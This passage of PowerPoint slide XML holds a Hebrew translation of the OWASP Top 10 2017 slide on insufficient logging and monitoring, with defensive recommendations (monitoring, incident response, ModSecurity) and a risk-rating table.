                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>integrity controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) או מחיקה, כגון טבלאות בבסיס נתונים המבצעות הוספה בלבד (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>append-only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) וכדומה.</a:t>
            </a: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יישם ניטור מספק והתראות כך שפעילויות חריגות מתגלות וניתנות למענה בזמן סביר.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישם או אמץ תהליך תגובה לאירועי אבטחת מידע, כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NIST 800-61 rev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או גרסאות עדכניות יותר</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קיימות מסגרות עבודה מסחריות או מבוססות קוד פתוח להגנה על יישומים כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שרתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web application firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> with the OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> Core Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> וקישור בין קבצי ניטור של יישומים עם מסכי תצוגה והתראות מעוצבות אישית.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>  תיעוד וניטור בלתי מספקים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3453038963"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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CB1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ניצול של תיעוד בלתי מספקת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וניטור הוא הבסיס לכמעט כל אירוע אבטחת מידע מהותי.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוקפים מסתמכים על מחסור בניטור וזמן תגובה ארוך על-מנת להשיג את מטרותיהם מבלי שיתגלו.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נושא זה כלול ברשימת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> על-בסיס </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>סקר</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> שבוצע בתעשייה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
